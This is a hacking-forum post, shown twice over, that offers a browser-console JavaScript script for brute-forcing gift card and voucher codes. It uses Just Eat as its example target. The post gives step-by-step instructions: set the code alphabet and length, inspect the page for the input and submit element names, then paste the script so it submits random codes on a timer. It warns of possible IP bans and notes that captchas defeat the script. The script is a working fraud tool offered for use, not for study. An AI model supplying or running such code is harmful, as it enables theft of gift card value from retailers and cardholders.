HACKED-
Content Licensing Manager
LEVEL 1
200 XP
GIFTCARD GENERATOR + CHECKER
Works with voucher codes and
Bruteforce ANY Giftcard with a simple webscript
*NO DOWNLOAD*
*REALLY HIGH CPM*
I'm not responsible for any temporary IP ban nor any account limitation you might encounter.
NOTE: won't work if there's a captcha or image verifiaction
Let's take Just Eat as example
Change the giftcard type/range to generate (alphanumeric/number only/letter only).
Change the max length of the possible input.
Then inspect element the input box and the submit button to get the variable names.
Voucher input example: Input box source: Verify input box: Submit button source: Verify button source: and replace it in the code like this...
After that, just paste the code in the console and click on Enter.
DEMO 1: DEMO 2 (UPDATED): var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc") function makeid() { var text = ""; var possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //enter the variables of the gift card *CAN BE CASE SENTITIVE DEPENDING ON THE GC*
for (var i = 0; i < 14; i++) //change the value depending on the length of the giftcard code text += possible.charAt(Math.floor(Math.random() * possible.length));
return text; }
function main() { document.getElementById("INPUTBOXNAME").value = makeid(); //you can change the element depending on the site document.getElementById("SUBMITBUTTONNAME").click(); } setInterval(function() { main(); }, speed);
HELP ME GROWING BY LEAVING A
LIKE LIKE LIKE
IT'S JUST A CLICK!
Works with voucher codes and
Bruteforce ANY Giftcard with a simple webscript
*NO DOWNLOAD*
*REALLY HIGH CPM*
I'm not responsible for any temporary IP ban nor any account limitation you might encounter.
NOTE: won't work if there's a captcha or image verifiaction
Let's take Just Eat as example
Change the giftcard type/range to generate (alphanumeric/number only/letter only).
Change the max length of the possible input.
Then inspect element the input box and the submit button to get the variable names.
Voucher input example: Input box source: Verify input box: Submit button source: Verify button source: and replace it in the code like this...
After that, just paste the code in the console and click on Enter.
DEMO 1: DEMO 2 (UPDATED): var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc") function makeid() { var text = ""; var possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //enter the variables of the gift card *CAN BE CASE SENTITIVE DEPENDING ON THE GC*
for (var i = 0; i < 14; i++) //change the value depending on the length of the giftcard code text += possible.charAt(Math.floor(Math.random() * possible.length));
return text; }
function main() { document.getElementById("INPUTBOXNAME").value = makeid(); //you can change the element depending on the site document.getElementById("SUBMITBUTTONNAME").click(); } setInterval(function() { main(); }, speed);
HELP ME GROWING BY LEAVING A
LIKE LIKE LIKE
IT'S JUST A CLICK!